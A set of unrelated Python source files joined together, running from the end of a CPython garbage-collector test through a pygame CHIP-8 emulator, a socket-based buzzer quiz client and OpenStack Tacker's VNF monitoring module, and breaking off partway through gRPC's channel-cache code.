gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
    """Run the GC test suites with automatic collection disabled.

    Saves the gc enabled flag and debug flags up front and restores
    them afterwards so the run does not leak configuration into the
    surrounding test process.
    """
    enabled = gc.isenabled()
    gc.disable()
    assert not gc.isenabled()
    debug = gc.get_debug()
    gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
    try:
        gc.collect() # Delete 2nd generation garbage
        run_unittest(GCTests, GCTogglingTests, GCCallbackTests)
    finally:
        gc.set_debug(debug)
        # test gc.enable() even if GC is disabled by default
        if verbose:
            print("restoring automatic collection")
        # make sure to always test gc.enable()
        gc.enable()
        assert gc.isenabled()
        if not enabled:
            gc.disable()
if __name__ == "__main__":
test_main()
|
main.py | from sys import exit as sysexit
from os import environ, getcwd
from threading import Thread
from tkinter import Tk, filedialog
import pygame
import chip8
CHIP8 = chip8.CPU()
pygame.init()
root = Tk(); root.withdraw()
environ['SDL_VIDEO_CENTERED'] = '1'
width, height = 1280, 720
scaleMult = 12
screen = pygame.display.set_mode((width, height), pygame.HWSURFACE)
pygame.display.set_caption("CHIP-8")
clock = pygame.time.Clock()
emulatorClock = pygame.time.Clock()
emulationSurface = pygame.Surface((64*scaleMult, 32*scaleMult), pygame.HWSURFACE)
black, white = (0,0,0), (255,255,255)
bgcolor = (57,68,82)
mfont = pygame.font.SysFont("Calibri", 24)
keyReference = [pygame.K_x,
pygame.K_1, pygame.K_2, pygame.K_3, pygame.K_q, pygame.K_w, pygame.K_e, pygame.K_a, pygame.K_s, pygame.K_d, pygame.K_z, pygame.K_c, pygame.K_4, pygame.K_r, pygame.K_f, pygame.K_v]
UIbuttonsReference = [( pygame.Rect(50,450,120,50), (mfont.render("Open ROM", True, white, black), (55, 465)) ), ( pygame.Rect(190,450,120,50), (mfont.render("Reset ROM", True, white, black), (195, 465)) )]
keyButtonsReference = [( pygame.Rect(50,550,25,25), "1" ), ( pygame.Rect(80,550,25,25), "2" ), ( pygame.Rect(110,550,25,25), "3" ), ( pygame.Rect(140,550,25,25), "C" ),
( pygame.Rect(50,580,25,25), "4" ), ( pygame.Rect(80,580,25,25), "5" ), ( pygame.Rect(110,580,25,25), "6" ), ( pygame.Rect(140,580,25,25), "D" ),
( pygame.Rect(50,610,25,25), "7" ), ( pygame.Rect(80,610,25,25), "8" ), ( pygame.Rect(110,610,25,25), "9" ), ( pygame.Rect(140,610,25,25), "E" ),
( pygame.Rect(50,640,25,25), "A" ), ( pygame.Rect(80,640,25,25), "0" ), ( pygame.Rect(110,640,25,25), "B" ), ( pygame.Rect(140,640,25,25), "F" )]
def drawDebug():
    """Render CHIP-8 CPU state (PC, opcode, I, and V0-VF) onto a new surface.

    Reads the global CHIP8 instance; returns a 300x600 pygame.Surface the
    caller blits onto the main screen.
    """
    s = pygame.Surface((300, 600), pygame.HWSURFACE)
    s.fill(bgcolor)
    # hex(..)[2::] strips the leading '0x'; values are shown upper-case.
    s.blit(mfont.render(( "PC: " + "x" + hex(CHIP8.pc)[2::].upper() ), True, white, bgcolor), (10,0))
    s.blit(mfont.render(( "Opcode: " + "x" + hex(CHIP8.opcode)[2::].upper() ), True, white, bgcolor), (10,20))
    s.blit(mfont.render(( "I: " + "x" + hex(CHIP8.I)[2::].upper() ), True, white, bgcolor), (10,40))
    # Two columns of 8 registers: i//8 picks the column, i%8 the row.
    for i in range(16):
        s.blit(mfont.render( ("V" + hex(i)[-1].upper() + ": " + "x" + hex(CHIP8.V[i])[2::].upper() ), True, white, bgcolor), (10 + 120*(i//8), 80 + (i % 8)*20))
    return s
def drawHandleUI():
    """Draw the pause indicator, the UI buttons, and the hex keypad.

    Keypad cells light up (grey background) while the corresponding
    CHIP-8 key is held; reads globals instructionAdvance and CHIP8.
    """
    if instructionAdvance:
        # Paused: single-step mode is active (toggled with the P key).
        screen.blit(mfont.render("Paused", True, (240, 15, 15), bgcolor), (50, 20))
    for b in UIbuttonsReference:
        pygame.draw.rect(screen, black, b[0])
        if b[1]:
            screen.blit(b[1][0], b[1][1])
    for mb in keyButtonsReference:
        # mb[1] is the hex key label; int(mb[1], 16) maps it to the key index.
        tempbgcol = black if CHIP8.key[int(mb[1], 16)] == 0 else (80,80,80)
        pygame.draw.rect(screen, tempbgcol, mb[0])
        screen.blit(mfont.render(mb[1], True, white, tempbgcol), (mb[0].x + 6, mb[0].y + 1))
instructionAdvance = False
resetROM = False
def runEmulator():
    """Emulator thread body: step the CPU at up to 300 Hz forever.

    Communicates with the UI thread through globals: instructionAdvance
    pauses execution, resetROM requests a reload of ROMname.  This loop
    never returns on its own.
    """
    global resetROM, instructionAdvance
    while True:
        if not instructionAdvance:
            CHIP8.emulationCycle()
        if resetROM:
            CHIP8.reInit()
            CHIP8.loadGame(ROMname)
            resetROM = False
        # Cap emulation speed at 300 cycles per second.
        emulatorClock.tick(300)
# NOTE(review): Windows-style path separators; breaks on POSIX -- consider os.path.join.
ROMname = getcwd() + "\\roms\\" + "TETRIS"
CHIP8.loadGame(ROMname)
# runEmulator() loops forever, so the old emulationThread.join() on quit
# could never return (and a non-daemon thread would also keep the process
# alive after sysexit()).  A daemon thread dies with the interpreter.
emulationThread = Thread(target=runEmulator, daemon=True)
emulationThread.start()
while True:
    activekeys = pygame.key.get_pressed()
    mousex, mousey = pygame.mouse.get_pos()
    for event in pygame.event.get():
        if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):
            # Daemon emulator thread is torn down automatically on exit.
            pygame.quit()
            sysexit()
        elif event.type == pygame.KEYDOWN:
            if event.key == pygame.K_SPACE:
                # Single-step one CPU cycle (useful while paused).
                CHIP8.emulationCycle()
            elif event.key == pygame.K_p:
                instructionAdvance = not instructionAdvance
        elif event.type == pygame.MOUSEBUTTONDOWN:
            if UIbuttonsReference[0][0].collidepoint(mousex, mousey):
                # "Open ROM" button: pick a file, then ask the emulator thread to reload.
                ROMname = filedialog.askopenfile().name
                resetROM = True
            elif UIbuttonsReference[1][0].collidepoint(mousex, mousey):
                # "Reset ROM" button: reload the current ROM.
                resetROM = True
    # Mirror the host keyboard into the CHIP-8 16-key keypad.
    for i in range(16):
        CHIP8.key[i] = activekeys[keyReference[i]]
    screen.fill(bgcolor)
    emulationSurface.fill((0,0,0))
    # Scale the 64x32 monochrome framebuffer up by scaleMult.
    for pixelY in range(32):
        for pixelX in range(64):
            pygame.draw.rect(emulationSurface, (black if CHIP8.gfx[(pixelY * 64) + pixelX] == 0 else white), pygame.Rect(pixelX*scaleMult, pixelY*scaleMult, scaleMult, scaleMult))
    screen.blit(emulationSurface, (50,50))
    screen.blit(drawDebug(), (830, 50))
    drawHandleUI()
    pygame.display.update()
    clock.tick(60)
|
client.py | SERVER_IP = ''
SERVER_PORT = 1644
import select
import threading
import sys
import random
import time
import socket
import termios
try:
    def Message_recv(s,killRequest):
        # Receive loop: block until the server reports who buzzed, then
        # signal the sender thread to stop via killRequest.
        while not killRequest.isSet():
            r, w, x = select.select([s], [], [])
            data = r[0].recv(1024)
            print data
            if data:
                killRequest.set()
    def Message_send(s, userid, killRequest, youBuzzed):
        # Send loop: poll stdin; any keypress "buzzes" by sending our id.
        # youBuzzed marks that this client won the buzzer round.
        while not killRequest.isSet():
            r, w, x = select.select([sys.stdin], [], [], 0.02)
            if r:
                s.send(str(userid))
                youBuzzed.set()
                time.sleep(0.01)
                break
    serverip = SERVER_IP
    serverport = SERVER_PORT
    # Random high client port; SO_REUSEADDR avoids bind errors on quick restarts.
    clientport = random.randint(2000, 3000)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(('', clientport))
    s.connect((serverip, serverport))
    # Handshake: server assigns our player number, then the winning score.
    userid = s.recv(1024)
    print "Hello. Your player number is : ", userid
    win_score = s.recv(1024)
    print "Press buzzer first to answer first. Score required to win is : ", win_score
    continue_next_round = 1
    while continue_next_round:
        question = s.recv(1024)
        killRequest = threading.Event()
        youBuzzed = threading.Event()
        sendThread = threading.Thread(target = Message_send, args = [s, userid, killRequest, youBuzzed])
        receiveThread = threading.Thread(target = Message_recv, args = [s, killRequest])
        time.sleep(0.1)
        print "Question:", question
        print "Buzzer Round"
        # Non-blocking during the buzzer race; restored to blocking after.
        s.setblocking(0)
        sendThread.start()
        receiveThread.start()
        receiveThread.join()
        sendThread.join()
        s.setblocking(1)
        # Drop any keystrokes typed during the race so they don't leak
        # into the answer prompt below.
        termios.tcflush(sys.stdin, termios.TCIOFLUSH)
        time.sleep(0.01)
        if youBuzzed.isSet():
            print "Answer the question : "
            givenAnswer = raw_input()
            s.send(givenAnswer)
        else:
            givenAnswer = s.recv(1024)
            print "Answer selected is :", givenAnswer
        # Round results arrive as a fixed sequence of messages:
        # verdict, correct answer, score tally, continue flag.
        is_correct_str = s.recv(1024)
        time.sleep(0.001)
        print is_correct_str
        trueAnswer = s.recv(1024)
        print "Correct answer is:",trueAnswer
        tally = s.recv(1024)
        tally = tally.split()
        print "Score of player"
        for i in range(len(tally)):
            print i, tally[i]
        continue_next_round = s.recv(1024)
        continue_next_round = int(continue_next_round)
    final_message = s.recv(1024)
    print final_message
except Exception as e:
    print e
finally:
    s.close()
|
monitor.py | # Copyright 2015 Intel Corporation.
# All Rights Reserved.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import inspect
import threading
import time
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from tacker.common import driver_manager
from tacker import context as t_context
from tacker.db.common_services import common_services_db_plugin
from tacker.plugins.common import constants
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
OPTS = [
cfg.IntOpt('check_intvl',
default=10,
help=_("check interval for monitor")),
]
CONF.register_opts(OPTS, group='monitor')
def config_opts():
    """Expose this module's option lists to oslo.config's discovery hook.

    Returns a list of (group, options) pairs covering both the module-level
    [monitor] options and each monitor class's 'tacker'-group options.
    """
    groups = [
        ('monitor', OPTS),
        ('tacker', VNFMonitor.OPTS),
        ('tacker', VNFAlarmMonitor.OPTS),
        ('tacker', VNFAppMonitor.OPTS),
    ]
    return groups
def _log_monitor_events(context, vnf_dict, evt_details):
    """Record a monitor event for the given VNF in the common-services DB."""
    plugin = common_services_db_plugin.CommonServicesPluginDb()
    plugin.create_event(
        context,
        res_id=vnf_dict['id'],
        res_type=constants.RES_TYPE_VNF,
        res_state=vnf_dict['status'],
        evt_type=constants.RES_EVT_MONITOR,
        tstamp=timeutils.utcnow(),
        details=evt_details)
class VNFMonitor(object):
    """Process-wide singleton that periodically health-checks hosted VNFs.

    A background thread wakes every ``_status_check_intvl`` seconds and runs
    the configured monitor drivers against every registered, non-dead VNF.
    """
    _instance = None
    _hosting_vnfs = dict()  # vnf_id => dict of parameters
    _status_check_intvl = 0
    _lock = threading.RLock()  # guards _hosting_vnfs across threads

    OPTS = [
        cfg.ListOpt(
            'monitor_driver', default=['ping', 'http_ping'],
            help=_('Monitor driver to communicate with '
                   'Hosting VNF/logical service '
                   'instance tacker plugin will use')),
    ]
    cfg.CONF.register_opts(OPTS, 'tacker')

    def __new__(cls, boot_wait, check_intvl=None):
        # Singleton: every construction returns the same instance.
        # NOTE(review): __init__ still runs on each construction, which would
        # re-spawn the monitor thread -- confirm callers build this only once.
        if not cls._instance:
            cls._instance = super(VNFMonitor, cls).__new__(cls)
        return cls._instance

    def __init__(self, boot_wait, check_intvl=None):
        """Load monitor drivers and start the polling thread.

        :param boot_wait: default monitoring delay (seconds) after VNF boot
        :param check_intvl: poll interval; falls back to
            CONF.monitor.check_intvl when None
        """
        self._monitor_manager = driver_manager.DriverManager(
            'tacker.tacker.monitor.drivers',
            cfg.CONF.tacker.monitor_driver)
        self.boot_wait = boot_wait
        if check_intvl is None:
            check_intvl = cfg.CONF.monitor.check_intvl
        self._status_check_intvl = check_intvl
        LOG.debug('Spawning VNF monitor thread')
        threading.Thread(target=self.__run__).start()

    def __run__(self):
        # Poll loop: sleep one interval, then monitor every registered VNF
        # that has not been marked dead. Holds _lock for the whole sweep.
        while(1):
            time.sleep(self._status_check_intvl)
            with self._lock:
                for hosting_vnf in VNFMonitor._hosting_vnfs.values():
                    if hosting_vnf.get('dead', False):
                        LOG.debug('monitor skips dead vnf %s', hosting_vnf)
                        continue
                    self.run_monitor(hosting_vnf)

    @staticmethod
    def to_hosting_vnf(vnf_dict, action_cb):
        """Convert a VNF DB record into the internal monitoring entry.

        :param vnf_dict: VNF dict with JSON-encoded 'mgmt_url' and
            'attributes'['monitoring_policy']
        :param action_cb: callable invoked with an action name when a
            monitor driver's return value matches a configured action
        """
        return {
            'id': vnf_dict['id'],
            'management_ip_addresses': jsonutils.loads(
                vnf_dict['mgmt_url']),
            'action_cb': action_cb,
            'vnf': vnf_dict,
            'monitoring_policy': jsonutils.loads(
                vnf_dict['attributes']['monitoring_policy'])
        }

    def add_hosting_vnf(self, new_vnf):
        """Register a VNF for monitoring and log a monitor event."""
        LOG.debug('Adding host %(id)s, Mgmt IP %(ips)s',
                  {'id': new_vnf['id'],
                   'ips': new_vnf['management_ip_addresses']})
        # boot_at anchors the monitoring-delay grace period in run_monitor.
        new_vnf['boot_at'] = timeutils.utcnow()
        with self._lock:
            VNFMonitor._hosting_vnfs[new_vnf['id']] = new_vnf
        attrib_dict = new_vnf['vnf']['attributes']
        mon_policy_dict = attrib_dict['monitoring_policy']
        evt_details = (("VNF added for monitoring. "
                        "mon_policy_dict = %s,") % (mon_policy_dict))
        _log_monitor_events(t_context.get_admin_context(), new_vnf['vnf'],
                            evt_details)

    def delete_hosting_vnf(self, vnf_id):
        """Stop monitoring vnf_id (no-op if it was never registered)."""
        LOG.debug('deleting vnf_id %(vnf_id)s', {'vnf_id': vnf_id})
        with self._lock:
            hosting_vnf = VNFMonitor._hosting_vnfs.pop(vnf_id, None)
            if hosting_vnf:
                LOG.debug('deleting vnf_id %(vnf_id)s, Mgmt IP %(ips)s',
                          {'vnf_id': vnf_id,
                           'ips': hosting_vnf['management_ip_addresses']})

    def run_monitor(self, hosting_vnf):
        """Run each per-VDU monitor driver once; fire any matching action."""
        mgmt_ips = hosting_vnf['management_ip_addresses']
        vdupolicies = hosting_vnf['monitoring_policy']['vdus']
        vnf_delay = hosting_vnf['monitoring_policy'].get(
            'monitoring_delay', self.boot_wait)
        for vdu in vdupolicies.keys():
            # Bail out mid-sweep if the VNF was marked dead by an action.
            if hosting_vnf.get('dead'):
                return
            policy = vdupolicies[vdu]
            for driver in policy.keys():
                params = policy[driver].get('monitoring_params', {})
                vdu_delay = params.get('monitoring_delay', vnf_delay)
                # Grace period: skip until the VDU has been up long enough.
                if not timeutils.is_older_than(
                        hosting_vnf['boot_at'], vdu_delay):
                    continue
                actions = policy[driver].get('actions', {})
                if 'mgmt_ip' not in params:
                    params['mgmt_ip'] = mgmt_ips[vdu]
                driver_return = self.monitor_call(driver,
                                                  hosting_vnf['vnf'],
                                                  params)
                LOG.debug('driver_return %s', driver_return)
                # The driver's return value selects the action to trigger.
                if driver_return in actions:
                    action = actions[driver_return]
                    hosting_vnf['action_cb'](action)

    def mark_dead(self, vnf_id):
        # Flag the VNF so the poll loop and run_monitor skip it.
        VNFMonitor._hosting_vnfs[vnf_id]['dead'] = True

    def _invoke(self, driver, **kwargs):
        # Dispatch to the driver method named after the *calling* function.
        method = inspect.stack()[1][3]
        return self._monitor_manager.invoke(
            driver, method, **kwargs)

    def monitor_get_config(self, vnf_dict):
        # NOTE(review): vnf_dict is passed where _invoke expects a driver
        # name -- confirm against driver_manager.DriverManager.invoke usage.
        return self._invoke(
            vnf_dict, monitor=self, vnf=vnf_dict)

    def monitor_url(self, vnf_dict):
        # NOTE(review): same driver-name question as monitor_get_config.
        return self._invoke(
            vnf_dict, monitor=self, vnf=vnf_dict)

    def monitor_call(self, driver, vnf_dict, kwargs):
        """Invoke the named driver's monitor_call with the given params."""
        return self._invoke(driver,
                            vnf=vnf_dict, kwargs=kwargs)
class VNFAppMonitor(object):
    """VNF application-level monitor (delegates to app_monitor drivers)."""
    OPTS = [
        cfg.ListOpt(
            'app_monitor_driver', default=['zabbix'],
            help=_('App monitoring driver to communicate with '
                   'Hosting VNF/logical service '
                   'instance tacker plugin will use')),
    ]
    cfg.CONF.register_opts(OPTS, 'tacker')

    def __init__(self):
        self._application_monitor_manager = driver_manager.DriverManager(
            'tacker.tacker.app_monitor.drivers',
            cfg.CONF.tacker.app_monitor_driver)

    def _create_app_monitoring_dict(self, dev_attrs, mgmt_url):
        """Build the app-monitoring policy dict with per-VDU mgmt IPs filled in.

        :param dev_attrs: VNF attributes; 'app_monitoring_policy' holds a
            Python-literal-encoded policy dict
        :param mgmt_url: Python-literal-encoded mapping of VDU name -> mgmt IP
        """
        app_policy = 'app_monitoring_policy'
        appmonitoring_dict = ast.literal_eval(dev_attrs[app_policy])
        # Parse mgmt_url once; previously it was re-parsed on every loop
        # iteration even though it never changes.
        mgmt_ips = ast.literal_eval(mgmt_url)
        for vduname in appmonitoring_dict['vdus'].keys():
            appmonitoring_dict['vdus'][vduname]['mgmt_ip'] = mgmt_ips[vduname]
        return appmonitoring_dict

    def create_app_dict(self, context, vnf_dict):
        """Return the app-monitoring dict for a VNF DB record."""
        dev_attrs = vnf_dict['attributes']
        mgmt_url = vnf_dict['mgmt_url']
        return self._create_app_monitoring_dict(dev_attrs, mgmt_url)

    def _invoke(self, driver, **kwargs):
        # Dispatch to the driver method named after the *calling* function.
        method = inspect.stack()[1][3]
        return self._application_monitor_manager.\
            invoke(driver, method, **kwargs)

    def add_to_appmonitor(self, applicationvnfdict, vnf_dict):
        """Start app monitoring using the driver named on the first VDU."""
        # list() is required: dict.keys() returns a non-indexable view on
        # Python 3, so keys()[0] raised TypeError.
        vdunode = list(applicationvnfdict['vdus'].keys())
        driver = applicationvnfdict['vdus'][vdunode[0]]['name']
        kwargs = applicationvnfdict
        return self._invoke(driver, vnf=vnf_dict, kwargs=kwargs)
class VNFAlarmMonitor(object):
    """VNF alarm monitor: wires alarm backends (e.g. ceilometer) to policies."""
    OPTS = [
        cfg.ListOpt(
            'alarm_monitor_driver', default=['ceilometer'],
            help=_('Alarm monitoring driver to communicate with '
                   'Hosting VNF/logical service '
                   'instance tacker plugin will use')),
    ]
    cfg.CONF.register_opts(OPTS, 'tacker')

    # get alarm here
    def __init__(self):
        self._alarm_monitor_manager = driver_manager.DriverManager(
            'tacker.tacker.alarm_monitor.drivers',
            cfg.CONF.tacker.alarm_monitor_driver)

    def update_vnf_with_alarm(self, plugin, context, vnf, policy_dict):
        """Register every trigger in policy_dict with its alarm driver.

        Returns a dict of trigger name -> alarm URL, or None (early return)
        when a trigger has no policy action configured.
        """
        triggers = policy_dict['triggers']
        alarm_url = dict()
        for trigger_name, trigger_dict in triggers.items():
            params = dict()
            params['vnf_id'] = vnf['id']
            params['mon_policy_name'] = trigger_name
            driver = trigger_dict['event_type']['implementation']
            # TODO(Tung Doan) trigger_dict.get('actions') needs to be used
            policy_action = trigger_dict.get('action')
            if len(policy_action) == 0:
                _log_monitor_events(t_context.get_admin_context(),
                                    vnf,
                                    "Alarm not set: policy action missing")
                return
            # Other backend policies with the construct (policy, action)
            # ex: (SP1, in), (SP1, out)

            def _refactor_backend_policy(bk_policy_name, bk_action_name):
                # Compose "<policy>-<action>" for scaling policies.
                policy = '%(policy_name)s-%(action_name)s' % {
                    'policy_name': bk_policy_name,
                    'action_name': bk_action_name}
                return policy

            # Rewrite scaling actions in place so the joined action string
            # below carries the scaling direction (in/out).
            for index, policy_action_name in enumerate(policy_action):
                filters = {'name': policy_action_name}
                bkend_policies = \
                    plugin.get_vnf_policies(context, vnf['id'], filters)
                if bkend_policies:
                    bkend_policy = bkend_policies[0]
                    if bkend_policy['type'] == constants.POLICY_SCALING:
                        # 'gt' comparisons scale out; everything else scales in.
                        cp = trigger_dict['condition'].\
                            get('comparison_operator')
                        scaling_type = 'out' if cp == 'gt' else 'in'
                        policy_action[index] = _refactor_backend_policy(
                            policy_action_name, scaling_type)

            # Support multiple action. Ex: respawn % notify
            action_name = '%'.join(policy_action)
            params['mon_policy_action'] = action_name
            alarm_url[trigger_name] = \
                self.call_alarm_url(driver, vnf, params)
            details = "Alarm URL set successfully: %s" % alarm_url
            _log_monitor_events(t_context.get_admin_context(),
                                vnf,
                                details)
        return alarm_url

    def process_alarm_for_vnf(self, vnf, trigger):
        """call in plugin

        Extract the alarm id/state from the trigger payload and hand it to
        the trigger's configured alarm driver.
        """
        params = trigger['params']
        mon_prop = trigger['trigger']
        alarm_dict = dict()
        alarm_dict['alarm_id'] = params['data'].get('alarm_id')
        alarm_dict['status'] = params['data'].get('current')
        # Only the first (trigger_name, trigger_dict) pair is consulted.
        trigger_name, trigger_dict = list(mon_prop.items())[0]
        driver = trigger_dict['event_type']['implementation']
        return self.process_alarm(driver, vnf, alarm_dict)

    def _invoke(self, driver, **kwargs):
        # Dispatch to the driver method named after the *calling* function.
        method = inspect.stack()[1][3]
        return self._alarm_monitor_manager.invoke(
            driver, method, **kwargs)

    def call_alarm_url(self, driver, vnf_dict, kwargs):
        """Ask the driver for the alarm URL for this VNF/policy."""
        return self._invoke(driver,
                            vnf=vnf_dict, kwargs=kwargs)

    def process_alarm(self, driver, vnf_dict, kwargs):
        """Forward a fired alarm to the driver for processing."""
        return self._invoke(driver,
                            vnf=vnf_dict, kwargs=kwargs)
|
_simple_stubs.py | # Copyright 2020 The gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions that obviate explicit stubs and explicit channels."""
import collections
import datetime
import os
import logging
import threading
from typing import (Any, AnyStr, Callable, Dict, Iterator, Optional, Sequence,
Tuple, TypeVar, Union)
import grpc
from grpc.experimental import experimental_api
# Type variables tying a stub invocation's request type to its response type.
RequestType = TypeVar('RequestType')
ResponseType = TypeVar('ResponseType')

OptionsType = Sequence[Tuple[str, str]]
# Cache identity of a channel: everything that affects channel behavior.
CacheKey = Tuple[str, OptionsType, Optional[grpc.ChannelCredentials],
                 Optional[grpc.Compression]]

_LOGGER = logging.getLogger(__name__)

# How long an unused channel stays cached, overridable via environment.
_EVICTION_PERIOD_KEY = "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS"
if _EVICTION_PERIOD_KEY in os.environ:
    _EVICTION_PERIOD = datetime.timedelta(
        seconds=float(os.environ[_EVICTION_PERIOD_KEY]))
    _LOGGER.debug("Setting managed channel eviction period to %s",
                  _EVICTION_PERIOD)
else:
    _EVICTION_PERIOD = datetime.timedelta(minutes=10)

# Hard cap on the number of simultaneously cached channels.
_MAXIMUM_CHANNELS_KEY = "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM"
if _MAXIMUM_CHANNELS_KEY in os.environ:
    _MAXIMUM_CHANNELS = int(os.environ[_MAXIMUM_CHANNELS_KEY])
    _LOGGER.debug("Setting maximum managed channels to %d", _MAXIMUM_CHANNELS)
else:
    _MAXIMUM_CHANNELS = 2**8

# Default per-RPC timeout in seconds, overridable via environment.
_DEFAULT_TIMEOUT_KEY = "GRPC_PYTHON_DEFAULT_TIMEOUT_SECONDS"
if _DEFAULT_TIMEOUT_KEY in os.environ:
    _DEFAULT_TIMEOUT = float(os.environ[_DEFAULT_TIMEOUT_KEY])
    _LOGGER.debug("Setting default timeout seconds to %f", _DEFAULT_TIMEOUT)
else:
    _DEFAULT_TIMEOUT = 60.0
def _create_channel(target: str, options: Sequence[Tuple[str, str]],
                    channel_credentials: Optional[grpc.ChannelCredentials],
                    compression: Optional[grpc.Compression]) -> grpc.Channel:
    """Construct a fresh channel to *target*.

    The insecure-credentials sentinel selects an insecure channel; any other
    credentials object yields a secure channel.
    """
    insecure = (channel_credentials
                is grpc.experimental.insecure_channel_credentials())
    if insecure:
        _LOGGER.debug(f"Creating insecure channel with options '{options}' " +
                      f"and compression '{compression}'")
        return grpc.insecure_channel(target, options=options,
                                     compression=compression)
    _LOGGER.debug(
        f"Creating secure channel with credentials '{channel_credentials}', "
        + f"options '{options}' and compression '{compression}'")
    return grpc.secure_channel(target, credentials=channel_credentials,
                               options=options, compression=compression)
class ChannelCache:
    """Process-wide cache of channels keyed by (target, options, credentials,
    compression), with background eviction by age and by count."""
    # NOTE(rbellevi): Untyped due to reference cycle.
    _singleton = None
    _lock: threading.RLock = threading.RLock()
    _condition: threading.Condition = threading.Condition(lock=_lock)
    _eviction_ready: threading.Event = threading.Event()

    # Insertion-ordered: the first entry is always the next eviction candidate.
    _mapping: Dict[CacheKey, Tuple[grpc.Channel, datetime.datetime]]
    _eviction_thread: threading.Thread

    def __init__(self):
        self._mapping = collections.OrderedDict()
        self._eviction_thread = threading.Thread(
            target=ChannelCache._perform_evictions, daemon=True)
        self._eviction_thread.start()

    @staticmethod
    def get():
        """Return the singleton cache, creating it on first use."""
        with ChannelCache._lock:
            if ChannelCache._singleton is None:
                ChannelCache._singleton = ChannelCache()
        # Don't hand out the cache until the eviction thread is running.
        # (Waiting outside the lock: the eviction thread needs the lock to
        # set this event.)
        ChannelCache._eviction_ready.wait()
        return ChannelCache._singleton

    def _evict_locked(self, key: CacheKey):
        # Caller must hold _lock.
        channel, _ = self._mapping.pop(key)
        _LOGGER.debug("Evicting channel %s with configuration %s.", channel,
                      key)
        channel.close()
        del channel

    @staticmethod
    def _perform_evictions():
        # Daemon loop: evict overflow immediately, evict overdue entries,
        # otherwise sleep until the oldest entry's deadline or a notify.
        while True:
            with ChannelCache._lock:
                ChannelCache._eviction_ready.set()
                if not ChannelCache._singleton._mapping:
                    ChannelCache._condition.wait()
                elif len(ChannelCache._singleton._mapping) > _MAXIMUM_CHANNELS:
                    key = next(iter(ChannelCache._singleton._mapping.keys()))
                    ChannelCache._singleton._evict_locked(key)
                    # And immediately reevaluate.
                else:
                    key, (_, eviction_time) = next(
                        iter(ChannelCache._singleton._mapping.items()))
                    now = datetime.datetime.now()
                    if eviction_time <= now:
                        ChannelCache._singleton._evict_locked(key)
                        continue
                    else:
                        time_to_eviction = (eviction_time - now).total_seconds()
                        # NOTE: We aim to *eventually* coalesce to a state in
                        # which no overdue channels are in the cache and the
                        # length of the cache is no longer than
                        # _MAXIMUM_CHANNELS. We tolerate momentary states in
                        # which these two criteria are not met.
                        ChannelCache._condition.wait(timeout=time_to_eviction)

    def get_channel(self, target: str, options: Sequence[Tuple[str, str]],
                    channel_credentials: Optional[grpc.ChannelCredentials],
                    insecure: bool,
                    compression: Optional[grpc.Compression]) -> grpc.Channel:
        """Return a cached channel for the configuration, creating one if
        needed and refreshing its eviction deadline on every hit."""
        if insecure and channel_credentials:
            raise ValueError("The insecure option is mutually exclusive with " +
                             "the channel_credentials option. Please use one " +
                             "or the other.")
        if insecure:
            channel_credentials = grpc.experimental.insecure_channel_credentials(
            )
        elif channel_credentials is None:
            _LOGGER.debug("Defaulting to SSL channel credentials.")
            channel_credentials = grpc.ssl_channel_credentials()
        key = (target, options, channel_credentials, compression)
        with self._lock:
            channel_data = self._mapping.get(key, None)
            if channel_data is not None:
                # Cache hit: move to the back (most-recently used) and
                # push the eviction deadline out by a full period.
                channel = channel_data[0]
                self._mapping.pop(key)
                self._mapping[key] = (channel, datetime.datetime.now() +
                                      _EVICTION_PERIOD)
                return channel
            else:
                channel = _create_channel(target, options, channel_credentials,
                                          compression)
                self._mapping[key] = (channel, datetime.datetime.now() +
                                      _EVICTION_PERIOD)
                # Wake the eviction thread when it may be sleeping on an
                # empty cache, or when we just crossed the size limit.
                if len(self._mapping) == 1 or len(
